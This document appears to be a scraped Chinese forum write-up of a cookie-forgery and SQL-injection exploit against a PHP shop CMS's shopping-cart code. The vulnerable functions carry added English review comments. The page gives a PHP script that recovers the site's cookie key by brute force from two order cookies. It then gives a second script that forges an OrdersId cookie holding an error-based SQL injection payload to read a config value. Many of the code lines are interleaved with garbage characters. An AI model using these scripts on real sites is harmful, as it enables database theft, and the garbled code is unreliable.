www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个 shopcar 类是如何生成 cookie 的
/**
 * Obfuscates $value and stores it as the cookie named $key.
 *
 * Arrays are first flattened by enCode() (the write-up describes the result
 * as a query-string such as "a=yy&b=cc"); scalars go straight to enCrypt().
 * The cookie is set for path '/' with a 36000-second lifetime.
 *
 * NOTE(review): the cookie is only obfuscated, not authenticated. enCrypt()
 * XORs the payload with a repeating key and base64-encodes it; nothing here
 * lets the reader detect a cookie that the client forged or altered, so every
 * field read back from this cookie must be treated as untrusted input and
 * validated before use (in particular before it reaches SQL).
 *
 * NOTE(review): setcookie() receives only name, value, expiry and path; no
 * `secure`, `httponly` or `domain` arguments are passed.
 *
 * @param string       $key   cookie name
 * @param array|string $value payload to store
 */
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        // arrays are serialised by enCode() before the XOR step
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // 36000 s = 10 hours
    setcookie($key,$value,time()+36000,'/');
}
简单地说，$key 就是 cookie 的 key，$value 就是 value；enCode 的作用是将 array 类型转换为 a=yy&b=cc&d=know 这样的形式，关键是 enCrypt 函数。
/**
 * First obfuscation layer applied to cookie payloads.
 *
 * Picks a per-call 32-character hex key, md5(rand(0, 32000)), and for every
 * byte of $txt appends the key character used followed by the byte XORed
 * with that key character, so $tmp is twice the length of $txt and carries
 * the key in the clear. The result is passed through setKey() and then
 * base64-encoded.
 *
 * NOTE(review): rand(0, 32000) yields at most 32001 distinct keys, and each
 * key character is written next to the byte it masks, so this layer provides
 * no secrecy on its own. Together with the repeating-key XOR in setKey() it
 * lets a client who knows its own plaintext recover the site-wide key (the
 * scenario this page describes). There is also no integrity tag. A fix needs
 * an authenticated construction (e.g. hash_hmac() over the payload, verified
 * with hash_equals()) plus a matching change to the decoding side, which is
 * not in this excerpt.
 *
 * @param string $txt plaintext (already enCode()d when it came from an array)
 * @return string base64 text stored in the cookie
 */
function enCrypt($txt)
{
    // seeding with microtime does not widen the key space: rand(0, 32000)
    // still produces one of 32001 values
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index once all 32 key characters have been used
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // key character in the clear, then plaintext byte XOR that character
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
/**
 * Second layer: repeating-key XOR with a key derived from the site secret.
 *
 * The key is md5(strtolower($cfg_cookie_encode)), i.e. 32 hex characters,
 * cycled over $txt. Because XOR is its own inverse, applying setKey() to its
 * own output with the same $cfg_cookie_encode returns the original input.
 *
 * NOTE(review): repeating-key XOR does not protect data whose plaintext is
 * known or guessable: XORing known plaintext with the output yields the key
 * stream directly, and the stream repeats every 32 bytes. strtolower() further
 * shrinks the effective secret, and md5's hex output limits every key byte to
 * [0-9a-f]. This function should not be relied on to keep cookie contents
 * secret or to detect tampering.
 *
 * @param string $txt bytes to transform (output of enCrypt()'s loop)
 * @return string same length as $txt
 */
function setKey($txt)
{
    // site-wide secret from the application configuration (read via global)
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // cycle through the 32 key characters
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
) W$ `# V* R9 x8 h然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。) j9 {) x7 u: T( M
具体代码如下:
/ X. t" i0 _/ ?6 ]! }1 ` ?$ j( W4 |<?php
$ T+ s# A% i8 p, W/ v* X6 n$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here" Y. Y3 [' t: c! i4 j8 r, j& ?) x; \
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
7 k9 d# A" @% @8 v* K$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
* G8 }% t' D, ^: Z: Bfunction reStrCode($code,$string)
5 e* o% [" @4 S& ]- }+ l{
3 B- r5 W7 _3 G1 e r7 t$code = base64_decode($code);: ^! z d* j3 j
$key = “”;
$ \/ e8 u, [3 V# \for($i=0 ; $i<32 ; $i++); f' G' |: q( e& \) v
{% r% g( V9 e, p* C( [$ b
$key .= $string[$i] ^ $code[$i];
% B) q9 P0 ]$ ]( L2 Y}
; q8 Q/ W2 Y8 m/ S( [7 Xreturn $key;# R; M9 g3 B4 L( ~; ]9 w8 I
}
8 c; e2 h# k3 t1 z8 ffunction getKeys($cookie,$plantxt). N7 _4 j, ^: {* e* ]5 `3 c
{
1 F$ c0 t0 q; P" o$tmp = $cookie;
5 Z' u% L) m7 K" C$results = array();
( b, o; e# c5 T7 h% Yfor($j=0 ; $j < 32000; $j++)8 z4 j- y9 v/ j3 @5 ? d6 f9 q6 Y
{
/ ` M: ^4 b# m5 |0 b9 E; o7 U' y$ o( }& w
$txt = $plantxt;
' y: N+ F& `8 n0 k" ^, i$ctr = 0;6 R8 v3 F {' b9 G0 ^8 W7 I
$tmp = ”;
) P+ @; E3 [" u0 c, V5 Q- W& V: }$encrypt_key = md5($j);+ o) ?& G. {0 Q5 z* `$ I/ L
for($i =0; $i < strlen($txt); $i ++)$ O( ^6 g7 B! j8 E2 P
{
6 g" F$ I' Z: k" I* i$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$ Z0 G) m6 ?% s% ?( Q+ ^ b
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
0 }3 {$ N* K2 S6 H}
/ K4 v. Q4 T& R: ?$ s6 W2 T$string = $tmp;
; T1 I$ B0 }5 {* V* x; Z$code = $cookie;# G+ p U/ b, Y4 S2 e
$result = reStrCode($code,$string);7 `$ u5 I& ?! i2 j- o
if(eregi(‘^[a-z0-9]+$’,$result)), `: G( L0 W- r, ^" e5 f, v4 q
{
% N4 g: O2 T. F5 eecho $result.”\n”;
$ F" C2 m; d% [: g# O4 [+ N8 P$results[] = $result;
$ f0 ~7 A/ b( D! V! y/ E8 e# z4 F) c}
+ y( O) D" X* L9 t3 t}# V5 T8 N* {# K9 O
return $results;
2 Y8 K5 T: A) d; [}) V& G3 H/ Y- Z3 W' s l6 _; L+ ~
$results1 = getKeys($cookie1,$plantxt);) T; L* ?& Q8 G) O! X+ M' x3 J
$results2 = getKeys($cookie2,$plantxt);
: s$ Y) @3 j1 ]8 T: jprint “\n——————–real key————————–\n”;+ Y' q' e; }! z- j# }. ]' _* i
foreach($results1 as $test1)
" o1 p! ?$ i8 ~{
Q& M8 Y6 W% l7 U' ]foreach($results2 as $test2)$ R, o# u6 }* [: t
{
' ^# g" W0 l/ g! ]0 `+ \$ Yif($test1 == $test2); i/ [. K) ^ N4 b5 X
{ d6 R3 J* t' p; Y, J* S0 F( U
echo $test1.”\n”;
( @" o1 [! K$ K/ E}
$ p9 N# `6 M: A5 ?6 n& b7 V}
- e* }" a( Y" x. @9 W" M" O, y0 {, s}$ d$ o) @; i% Y- u3 B6 M
?>6 M c: U; W, Y P
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie，
plantxt 可以根据页面自己推算，大概是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出 md5(strtolower($cfg_cookie_encode))
得到这个 key 之后，我们就可以构造任意购物车的 cookie。
接着看
6 B6 @* t" c) v/ V8 t20 class MemberShops
% r) m& M& U3 s) z0 g ? f21 {' k9 I5 Z+ P1 O0 X/ [
22 var $OrdersId;, Z% H/ K5 j9 K, v% }
23 var $productsId;" W3 c# G( l+ x: ^' Q
24
/**
 * Initialises the shop session from the client's cookies.
 *
 * OrdersId is read from the "OrdersId" cookie via getCookie() (not shown in
 * this excerpt; presumably the counterpart of shopcar's saveCookie()) and,
 * when that value is empty, a fresh id is created with MakeOrders().
 *
 * NOTE(review): $this->OrdersId therefore originates from a client-supplied
 * cookie. The page later shows /plus/carbuyaction.php interpolating it into
 * an SQL string (`WHERE oid='$OrdersId'`) with no escaping or parameter
 * binding, so the value must be validated here (e.g. checked against the
 * format MakeOrders() produces) and bound as a prepared-statement parameter
 * at the query site.
 *
 * NOTE(review): empty() also treats "0" as unset, so an order id of "0" would
 * silently be replaced by a new one.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if(empty($this->OrdersId))
    {
        // no usable cookie: allocate a new order id
        $this->OrdersId = $this->MakeOrders();
    }
}
发现 OrdersId 是从 cookie 里面获取的
然后
/plus/carbuyaction.php 中的
// /plus/carbuyaction.php (excerpt; original line numbers 29, 39 and 173)
$cart = new MemberShops();
// order id recorded for this request; it comes from the client's "OrdersId"
// cookie (see MemberShops::__construct), so it is client-controlled
$OrdersId = $cart->OrdersId;
// ... intervening lines omitted by the write-up ...
// NOTE(review): $OrdersId is concatenated straight into the SQL string. Being
// cookie-derived it is an SQL injection sink; validate it against the expected
// id format before use and pass it as a bound query parameter instead.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
- f( x9 I7 O8 h: ~6 Q' }接着我们就可以注入了
* m/ n' e7 \/ ~通过利用下面代码生成cookie:% Z; o6 S0 ?; K0 N' ?
<?php* z$ Y5 D4 x+ R6 g
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
5 ?$ L) _; k e3 _5 A% P$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here* x( i% H* b$ ~
function setKey($txt)2 h& E Z: L, e. X; {2 _
{4 x2 k/ l/ y ?( L6 \2 W! t
global $encrypt_key;4 m1 y; t0 y' d$ Q$ z) O( n
$ctr = 0;
' c6 z6 H% l9 s$tmp = ”;
2 q3 g6 U2 _% `! p }1 Pfor($i = 0; $i < strlen($txt); $i++)
g* i! A- B9 \' R. w& E- `2 s{
% v6 N7 [( |+ l U) s$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;2 P0 D) _( z3 u8 v% z9 Q
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];* T; C6 _9 q# P" m9 a5 U
}
- s/ j9 {0 U4 ^& M) _$ d zreturn $tmp;, W/ o+ u6 p9 E7 E& c0 s- \/ {
}
& E1 I# E: M7 h2 H' X; Vfunction enCrypt($txt), `9 Y" P5 ?$ \
{
! Q# P1 g+ H6 i& \+ ksrand((double)microtime() * 1000000);
" v% v* v9 G. ]1 |7 a$encrypt_key = md5(rand(0, 32000));
/ ~' k' a6 x8 s6 e" |2 ^% o" Y$ctr = 0;- ~" H. t2 e7 C" z' u
$tmp = ”;1 y4 ^, l3 D0 v# p; b
for($i = 0; $i < strlen($txt); $i++)
, ]( o7 O# Z, n( ]( Q. z/ t; x{ @* b8 H* `5 Y5 f& B5 H o
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
8 I+ t4 G- m! `$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);) i, V5 _( I* N5 R J; w+ E+ M
}/ K- P" {. \9 d/ N1 n3 J" j7 z) [
return base64_encode(setKey($tmp));. b& j: r7 H& H# H- c* G8 V0 _- n
}6 N+ I9 ^! z7 J" d- p
for($dest =0;$dest = enCrypt($txt);)* O- F4 z$ R. H* V; ~8 D3 Y
{8 b5 p- E* n0 u% W
if(!strpos($dest,’+'))# ]' J8 G( y) M5 E! p
{
4 y* a+ k% Z( g1 i5 ubreak;
( S A9 a9 X; S r9 z$ _( \# i' t}
3 Z5 E1 v" E1 d @' A3 ~. l}6 `/ V _) j) f+ A: O% o
echo $dest.”\n”;0 y; p2 m- N: x1 }4 i" Y, ]
?> f R$ y# [, g5 E
1 }5 u' i+ L. u7 i3 I |